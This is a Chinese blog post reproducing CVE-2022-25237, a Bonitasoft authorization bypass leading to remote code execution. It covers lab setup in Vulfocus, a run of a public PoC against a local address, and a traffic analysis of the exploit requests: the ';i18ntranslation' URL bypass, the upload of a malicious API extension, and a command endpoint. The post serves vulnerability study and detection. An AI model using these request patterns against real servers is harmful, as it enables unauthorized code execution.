码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CVE-2022-25237 Bonitasoft Platform RCE漏洞复现


    目录

    0x01 声明:

    0x02 简介:

    0x03 漏洞概述:

    0x04 影响版本:

    For community(社区版):

    For subscription(订阅版):

    0x05 环境搭建:

    Vulfocus环境搭建:

    漏洞环境搭建:

    访问页面:

    0x06 漏洞复现:

    创建用户:

    利用POC:

    0x07 流量分析:

    特征一:

    客户端:

    服务端:

    特征二:

    客户端:

    服务端:

    特征三:

    客户端:

    服务端:

    特征四:

    客户端:

    服务端:

    0x08 修复建议:

    0x09参考连接:


    0x01 声明:

            仅供学习参考使用,请勿用作违法用途,否则后果自负。

    0x02 简介:

        Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。

    0x03 漏洞概述:

        在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行。

    0x04 影响版本:

    For community(社区版):

    2022.1-u0 (7.14.0) 以下

    For subscription(订阅版):

    2022.1-u0 (7.14.0) 以下

    2021.2-u4 (7.13.4) 以下

    2021.1-0307 (7.12.11) 以下

    7.11.7 以下

    0x05 环境搭建:

    Vulfocus环境搭建:

    参考这篇文章:

    (7条消息) Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客https://blog.csdn.net/qq_44281295/article/details/127022162

    漏洞环境搭建:

    在Vulfocus环境后台执行:

    docker pull bonita:7.13.0

    访问页面:

    0x06 漏洞复现:

    创建用户:

    默认账号密码:install/install

    利用POC:

    下载地址:

    https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2022-25237

    python CVE-2022-25237.py poc poc http://192.168.119.155:43378/bonita 'uname -a'

    0x07 流量分析:

    特征一:

    客户端:

    Url:POST /bonita/loginservice HTTP/1.1

    Data:username=poc&password=poc

    服务端:

    Status_code:HTTP/1.1 204

    特征二:

    客户端:

    Url: POST /bonita/API/pageUpload;i18ntranslation?action=add HTTP/1.1

    Content-Disposition: form-data; name="file"; filename="rce_api_extension.zip"

    服务端:

    Status_code:HTTP/1.1 200

    Data:{"filename":"rce_api_extension.zip","tempPath":"tmp_9332037509706769580.zip","contentType":"application\/octet-stream"}

    特征三:

    客户端:

    1. Url:POST /bonita/API/portal/page/;i18ntranslation HTTP/1.1
    2. Data:{"contentName": "rce_api_extension.zip", "pageZip": "tmp_9332037509706769580.zip"}

    服务端:

    Status_code:HTTP/1.1 200

    Data:{"processDefinitionId":"","updatedBy":"1","urlToken":"custompage_resourceNameRestAPI","displayName":"RCE","lastUpdateDate":"2022-10-19 09:12:08.054","description":"REST API to manage resourceName","creationDate":"2022-10-19 09:12:08.054","contentName":"rce_api_extension.zip","isHidden":"false","isEditable":"true","createdBy":"1","isProvided":"false","id":"35","isRemovable":"true","contentType":"apiExtension"}

    特征四:

    客户端:

    Url:GET /bonita/API/extension/rce?p=0&c=1&cmd='uname HTTP/1.1

    服务端:

    Status_code:HTTP/1.1 403

    0x08 修复建议:

    更新至安全无漏洞版本。

    0x09参考连接:

    https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/

  • 相关阅读:
    【Django】开发日报_13_Day:手机号码管理系统(11)
    Vue 2.0——初识组件
    数据库升级到19后,大量的 ORA-3137「kpoal8Check-5」 错误
    【Proteus仿真】8位数码管动态扫描显示变化数据
    区间DP day42
    Vue2.0开发之——Vue基础用法-初步使用(14)
    请问上传失败原因以及调整方法
    java-net-php-python-jsp学生会人事管理信息系统计算机毕业设计程序
    企业如何安全的使用U盘
    java高校教师个人信息管理系统计算机毕业设计MyBatis+系统+LW文档+源码+调试部署
  • 原文地址:https://blog.csdn.net/qq_44281295/article/details/127412330
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号